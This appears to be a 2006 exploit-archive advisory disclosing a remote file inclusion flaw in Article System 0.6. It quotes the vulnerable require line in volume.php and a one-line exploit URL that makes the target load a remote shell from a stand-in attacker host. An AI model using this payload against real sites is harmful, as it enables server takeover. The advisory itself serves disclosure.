37 lines
No EOL
1.1 KiB
Text
37 lines
No EOL
1.1 KiB
Text
**********************************************************************************************************
|
|
|
|
Coding 4 Fun (c4f.pl)
|
|
|
|
**********************************************************************************************************
|
|
|
|
* Article System 0.6 ;
|
|
|
|
* Class = Remote File Inclusion ;
|
|
|
|
* Download = http://sourceforge.net/project/showfiles.php?group_id=49971&package_id=43403&release_id=325871 ;
|
|
|
|
* Found by = GregStar (gregstar[at]c4f[dot]pl) ;
|
|
|
|
-------------------------------------------------------------------------------------------------------------------
|
|
|
|
|
|
- Vulnerable Code in volume.php:
|
|
|
|
require "{$config['public_dir']}/templates/html/volume.php" ;
|
|
|
|
|
|
- Exploit:
|
|
|
|
http://[target]/[path]/volume.php?config[public_dir]=http://evilsite.com/shell?
|
|
|
|
|
|
------------------------------------------------------------------------------------------------------------------
|
|
|
|
|
|
Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,kw@ch and for all friends.
|
|
|
|
|
|
|
|
**************************************************************************************************************
|
|
|
|
# milw0rm.com [2006-11-02] |